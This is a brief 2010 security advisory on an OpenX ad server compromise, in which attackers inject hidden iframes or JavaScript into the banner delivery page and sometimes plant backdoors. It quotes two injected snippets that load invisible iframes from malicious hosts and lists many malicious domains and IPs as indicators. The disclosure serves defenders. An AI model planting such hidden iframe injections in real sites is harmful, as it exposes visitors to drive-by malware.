OpenX Banner Page Hack
Updated: September 8, 2010
The OpenX banner page hack places a malicious JavaScript or Iframe into the banner page (/www/delivery/ajs.php) produced by an OpenX ad server. This is sometimes accomplished with a plugin and in other cases the code is injected into the OpenX database. The hackers have been inserting backdoor scripts, which allow the hacker to remote access to the ad server, into some of the hacked ad servers. The hack appears to able infect ad servers running up to version 2.8.4. OpenX has not provided release notes or any other information on what changes were made in 2.8.5. A previous hack infected ad servers last December and was patched in version 2.8.3
Recent Script Formats:
document.write('iframe src="http://ads.fake-isp.com/stats?counter=8140" width=0 height=0></iframe>');
<"+"iframe src=\"http://liveinternit.com/?1\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>
Recent Malware Domains: google-analitics.net, newspickerdot.com, newtickepicker.com, alphapopup.com, betapopup.com, tracker.ads.is, elnkvdgtbui.com, liveinternit.com, worldwesttrans.com, liveinterneta.info, waycity.net, trfafsegh.com, appledrink.net, apple-drink.com, wakesone.com, adturbodomain.com, doubleclickredirect.com, ads.fake-isp.com, morolight.net, plutoday.com, ads.imagetemplate.com, smallsun.net, banan.uk.to, on-sunday.net, smallsun.net, minutesun.net, njgya.com, googleanalyticsz.com, googleanalyticz.com, mjgjo.com, green-fast.net, whoiz.shit.la, storesigma.com, stalkx.qc.to, googleredirector.com, fortraffic001.com, svyazko.eba.la, googleredirector2.com, gooogleananalytics.com, banan.biz.tm, trafficbiz003.com, mashckinvalery.com, 85.234.190.0, 85.234.190.42, 194.8.250.0, 194.8.250.211, blamesslek.com
